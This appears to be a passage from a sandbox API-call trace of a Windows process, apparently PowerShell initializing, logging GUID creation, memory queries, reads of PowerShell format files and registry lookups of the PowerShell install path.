	[0296.215] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.215] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xe7854000, Data2=0x7ae8, Data3=0x4c4f, Data4=([0]=0x8d, [1]=0x8e, [2]=0xf0, [3]=0x14, [4]=0x2f, [5]=0x3e, [6]=0xab, [7]=0x84))) returned 0x0
	[0296.215] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x8738d0dd, Data2=0x3758, Data3=0x42df, Data4=([0]=0x84, [1]=0xbe, [2]=0x4a, [3]=0xe9, [4]=0xb2, [5]=0xe8, [6]=0x53, [7]=0x63))) returned 0x0
	[0296.215] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xf4c428be, Data2=0xc883, Data3=0x4161, Data4=([0]=0x8f, [1]=0x13, [2]=0xee, [3]=0x4b, [4]=0x6f, [5]=0x81, [6]=0x81, [7]=0x3a))) returned 0x0
	[0296.215] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xfa4aa820, Data2=0x34c8, Data3=0x4f55, Data4=([0]=0x87, [1]=0x74, [2]=0x73, [3]=0xa7, [4]=0x63, [5]=0x58, [6]=0x8b, [7]=0x6d))) returned 0x0
	[0296.215] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x13195965, Data2=0x9d60, Data3=0x46d2, Data4=([0]=0x87, [1]=0x86, [2]=0x4e, [3]=0x1e, [4]=0xee, [5]=0x9a, [6]=0x22, [7]=0x2))) returned 0x0
	[0296.215] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xbec13f65, Data2=0x8fac, Data3=0x4eb4, Data4=([0]=0x95, [1]=0x38, [2]=0xb0, [3]=0x2f, [4]=0x7f, [5]=0x4a, [6]=0xd6, [7]=0x12))) returned 0x0
	[0296.215] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x1af7ef22, Data2=0x22a7, Data3=0x44cd, Data4=([0]=0xb7, [1]=0x62, [2]=0xfa, [3]=0x6d, [4]=0xd, [5]=0x7d, [6]=0x2e, [7]=0x2b))) returned 0x0
	[0296.216] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x5ef5158d, Data2=0x573f, Data3=0x404e, Data4=([0]=0x88, [1]=0x71, [2]=0x6f, [3]=0x8e, [4]=0x2d, [5]=0x97, [6]=0x74, [7]=0xc0))) returned 0x0
	[0296.216] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x215feefe, Data2=0x142, Data3=0x4609, Data4=([0]=0xbd, [1]=0xb3, [2]=0x12, [3]=0x40, [4]=0x12, [5]=0xe6, [6]=0x0, [7]=0x36))) returned 0x0
	[0296.216] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xf8e3e471, Data2=0x2d85, Data3=0x4c53, Data4=([0]=0xb6, [1]=0x56, [2]=0x2c, [3]=0xd3, [4]=0xad, [5]=0xe5, [6]=0x41, [7]=0x71))) returned 0x0
	[0296.216] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x2ce28b9f, Data2=0xda7d, Data3=0x49df, Data4=([0]=0x95, [1]=0x59, [2]=0x17, [3]=0x38, [4]=0xad, [5]=0xd, [6]=0x5a, [7]=0xdf))) returned 0x0
	[0296.216] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x4a00bd7c, Data2=0xa298, Data3=0x42e8, Data4=([0]=0x80, [1]=0xe4, [2]=0xd4, [3]=0xff, [4]=0xd3, [5]=0x1a, [6]=0x5c, [7]=0x3d))) returned 0x0
	[0296.216] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xd9c1e73, Data2=0xbcef, Data3=0x4daf, Data4=([0]=0xac, [1]=0x82, [2]=0x27, [3]=0x29, [4]=0x65, [5]=0xf2, [6]=0x8, [7]=0x2e))) returned 0x0
	[0296.216] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.216] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x44154293, Data2=0xee5a, Data3=0x430e, Data4=([0]=0x80, [1]=0x8, [2]=0x31, [3]=0x83, [4]=0x84, [5]=0xb2, [6]=0x6, [7]=0x3d))) returned 0x0
	[0296.216] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.217] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.217] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x6ab582d8, Data2=0x9110, Data3=0x4856, Data4=([0]=0x80, [1]=0x13, [2]=0xc6, [3]=0xfa, [4]=0x7a, [5]=0xe, [6]=0x24, [7]=0x41))) returned 0x0
	[0296.217] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.217] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x72b06475, Data2=0xfe4, Data3=0x426c, Data4=([0]=0x88, [1]=0x9e, [2]=0xaa, [3]=0xe1, [4]=0xdf, [5]=0xec, [6]=0x51, [7]=0x4c))) returned 0x0
	[0296.217] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x440ae78d, Data2=0xec41, Data3=0x45ac, Data4=([0]=0x99, [1]=0x6e, [2]=0x9a, [3]=0x60, [4]=0x41, [5]=0xdb, [6]=0xad, [7]=0x98))) returned 0x0
	[0296.218] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x9e8851bb, Data2=0x2822, Data3=0x42c8, Data4=([0]=0xb3, [1]=0x95, [2]=0x4c, [3]=0xd4, [4]=0xd4, [5]=0x10, [6]=0x71, [7]=0xc3))) returned 0x0
	[0296.218] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xacc0b5a0, Data2=0xb358, Data3=0x4e77, Data4=([0]=0xb3, [1]=0xe3, [2]=0x8, [3]=0x52, [4]=0xe1, [5]=0x7, [6]=0xb8, [7]=0xe6))) returned 0x0
	[0296.218] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xeedaa1cf, Data2=0xc4ba, Data3=0x4988, Data4=([0]=0xa2, [1]=0x85, [2]=0x8c, [3]=0x52, [4]=0x93, [5]=0x4a, [6]=0x87, [7]=0xdb))) returned 0x0
	[0296.218] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xe7922a22, Data2=0x6c03, Data3=0x43b9, Data4=([0]=0xaa, [1]=0x19, [2]=0x2a, [3]=0xb8, [4]=0xb6, [5]=0x64, [6]=0x48, [7]=0x53))) returned 0x0
	[0296.218] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x3769fe5, Data2=0x56a9, Data3=0x4dfa, Data4=([0]=0xb1, [1]=0x71, [2]=0x47, [3]=0x33, [4]=0xb2, [5]=0xf7, [6]=0x5, [7]=0xaa))) returned 0x0
	[0296.218] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.218] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x85e92414, Data2=0x191b, Data3=0x49bb, Data4=([0]=0x84, [1]=0xfb, [2]=0x3, [3]=0x44, [4]=0x34, [5]=0x79, [6]=0xb7, [7]=0xc2))) returned 0x0
	[0296.218] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xcb17bd39, Data2=0x209, Data3=0x4b4e, Data4=([0]=0xa5, [1]=0xc7, [2]=0x8e, [3]=0x93, [4]=0xb2, [5]=0x8b, [6]=0x9f, [7]=0x14))) returned 0x0
	[0296.218] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xcdc15f13, Data2=0x7892, Data3=0x424e, Data4=([0]=0x81, [1]=0x9, [2]=0x27, [3]=0xc8, [4]=0x8, [5]=0x4a, [6]=0xc5, [7]=0xb4))) returned 0x0
	[0296.218] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x68be024f, Data2=0x2761, Data3=0x4474, Data4=([0]=0xb5, [1]=0x38, [2]=0xa8, [3]=0x49, [4]=0xc8, [5]=0x93, [6]=0x96, [7]=0x28))) returned 0x0
	[0296.218] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x48d00172, Data2=0x4bdf, Data3=0x4f2e, Data4=([0]=0xb2, [1]=0x29, [2]=0x45, [3]=0x6d, [4]=0x8c, [5]=0x47, [6]=0xce, [7]=0x5))) returned 0x0
	[0296.219] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.219] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x7332144b, Data2=0xef59, Data3=0x4e99, Data4=([0]=0x8b, [1]=0xd8, [2]=0x50, [3]=0x8b, [4]=0xc9, [5]=0x58, [6]=0xc0, [7]=0x14))) returned 0x0
	[0296.219] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x4d47557, Data2=0x9048, Data3=0x4d3b, Data4=([0]=0x95, [1]=0x5b, [2]=0xbb, [3]=0x6b, [4]=0xc, [5]=0x58, [6]=0x65, [7]=0xdb))) returned 0x0
	[0296.219] VirtualQuery (in: lpAddress=0x1abd70, lpBuffer=0x1acc30, dwLength=0x30 | out: lpBuffer=0x1acc30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.219] VirtualQuery (in: lpAddress=0x1abd70, lpBuffer=0x1acc30, dwLength=0x30 | out: lpBuffer=0x1acc30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.219] VirtualQuery (in: lpAddress=0x1abd70, lpBuffer=0x1acc30, dwLength=0x30 | out: lpBuffer=0x1acc30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.219] VirtualQuery (in: lpAddress=0x1abd70, lpBuffer=0x1acc30, dwLength=0x30 | out: lpBuffer=0x1acc30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.219] SetErrorMode (uMode=0x1) returned 0x1
	[0296.219] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0296.219] GetFileType (hFile=0x32c) returned 0x1
	[0296.219] SetErrorMode (uMode=0x1) returned 0x1
	[0296.219] GetFileType (hFile=0x32c) returned 0x1
	[0296.220] ReadFile (in: hFile=0x32c, lpBuffer=0x33a2c98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33a2c98*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.220] ReadFile (in: hFile=0x32c, lpBuffer=0x33a2c98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33a2c98*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.220] ReadFile (in: hFile=0x32c, lpBuffer=0x33a2c98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33a2c98*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.221] ReadFile (in: hFile=0x32c, lpBuffer=0x33a2c98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33a2c98*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.221] ReadFile (in: hFile=0x32c, lpBuffer=0x33a2c98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33a2c98*, lpNumberOfBytesRead=0x1ad098*=0x8b4, lpOverlapped=0x0) returned 1
	[0296.221] ReadFile (in: hFile=0x32c, lpBuffer=0x33a20b4, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33a20b4*, lpNumberOfBytesRead=0x1ad098*=0x0, lpOverlapped=0x0) returned 1
	[0296.221] ReadFile (in: hFile=0x32c, lpBuffer=0x33a2c98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33a2c98*, lpNumberOfBytesRead=0x1ad098*=0x0, lpOverlapped=0x0) returned 1
	[0296.221] CloseHandle (hObject=0x32c) returned 1
	[0296.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0296.221] SetErrorMode (uMode=0x1) returned 0x1
	[0296.222] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad040 | out: lpFileInformation=0x1ad040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0296.222] SetErrorMode (uMode=0x1) returned 0x1
	[0296.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0296.222] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad128 | out: phkResult=0x1ad128*=0x32c) returned 0x0
	[0296.222] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad0ac, lpData=0x0, lpcbData=0x1ad0a8*=0x0 | out: lpType=0x1ad0ac*=0x1, lpData=0x0, lpcbData=0x1ad0a8*=0x56) returned 0x0
	[0296.222] CoTaskMemAlloc (cb=0x5a) returned 0x1b6ea6d0
	[0296.222] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad07c, lpData=0x1b6ea6d0, lpcbData=0x1ad078*=0x56 | out: lpType=0x1ad07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad078*=0x56) returned 0x0
	[0296.222] CoTaskMemFree (pv=0x1b6ea6d0) 
	[0296.222] RegCloseKey (hKey=0x32c) returned 0x0
	[0296.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0296.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0296.223] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xc05c2c10, Data2=0x84c5, Data3=0x4f31, Data4=([0]=0x89, [1]=0xed, [2]=0xc2, [3]=0x6f, [4]=0x87, [5]=0xc5, [6]=0x30, [7]=0xb1))) returned 0x0
	[0296.223] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xac394f8e, Data2=0xdbc8, Data3=0x494f, Data4=([0]=0x9a, [1]=0x78, [2]=0x78, [3]=0xa9, [4]=0x8d, [5]=0x4e, [6]=0x2, [7]=0x93))) returned 0x0
	[0296.223] SetErrorMode (uMode=0x1) returned 0x1
	[0296.223] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0296.223] GetFileType (hFile=0x32c) returned 0x1
	[0296.223] SetErrorMode (uMode=0x1) returned 0x1
	[0296.223] GetFileType (hFile=0x32c) returned 0x1
	[0296.223] ReadFile (in: hFile=0x32c, lpBuffer=0x33e0a80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33e0a80*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.224] ReadFile (in: hFile=0x32c, lpBuffer=0x33e0a80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33e0a80*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.224] ReadFile (in: hFile=0x32c, lpBuffer=0x33e0a80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33e0a80*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.224] ReadFile (in: hFile=0x32c, lpBuffer=0x33e0a80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33e0a80*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0296.224] ReadFile (in: hFile=0x32c, lpBuffer=0x33e0a80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33e0a80*, lpNumberOfBytesRead=0x1ad098*=0xe98, lpOverlapped=0x0) returned 1
	[0296.224] ReadFile (in: hFile=0x32c, lpBuffer=0x33e0080, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33e0080*, lpNumberOfBytesRead=0x1ad098*=0x0, lpOverlapped=0x0) returned 1
	[0296.225] ReadFile (in: hFile=0x32c, lpBuffer=0x33e0a80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33e0a80*, lpNumberOfBytesRead=0x1ad098*=0x0, lpOverlapped=0x0) returned 1
	[0296.225] CloseHandle (hObject=0x32c) returned 1
	[0296.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0296.225] SetErrorMode (uMode=0x1) returned 0x1
	[0296.225] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad040 | out: lpFileInformation=0x1ad040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0296.225] SetErrorMode (uMode=0x1) returned 0x1
	[0296.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0296.225] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad128 | out: phkResult=0x1ad128*=0x32c) returned 0x0
	[0296.225] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad0ac, lpData=0x0, lpcbData=0x1ad0a8*=0x0 | out: lpType=0x1ad0ac*=0x1, lpData=0x0, lpcbData=0x1ad0a8*=0x56) returned 0x0
	[0296.225] CoTaskMemAlloc (cb=0x5a) returned 0x1b6ea6d0
	[0296.225] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad07c, lpData=0x1b6ea6d0, lpcbData=0x1ad078*=0x56 | out: lpType=0x1ad07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad078*=0x56) returned 0x0
	[0296.225] CoTaskMemFree (pv=0x1b6ea6d0) 
	[0296.226] RegCloseKey (hKey=0x32c) returned 0x0
	[0296.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0296.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0296.226] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.226] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xb31eed1c, Data2=0x3aa1, Data3=0x4903, Data4=([0]=0x82, [1]=0xb4, [2]=0xd4, [3]=0x96, [4]=0x77, [5]=0x3a, [6]=0xbe, [7]=0xb9))) returned 0x0
	[0296.226] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x391f62c1, Data2=0x2d0f, Data3=0x4096, Data4=([0]=0xac, [1]=0xf2, [2]=0x21, [3]=0x2d, [4]=0xa0, [5]=0xf7, [6]=0xf6, [7]=0x18))) returned 0x0
	[0296.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0296.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0296.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0296.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0296.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0296.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
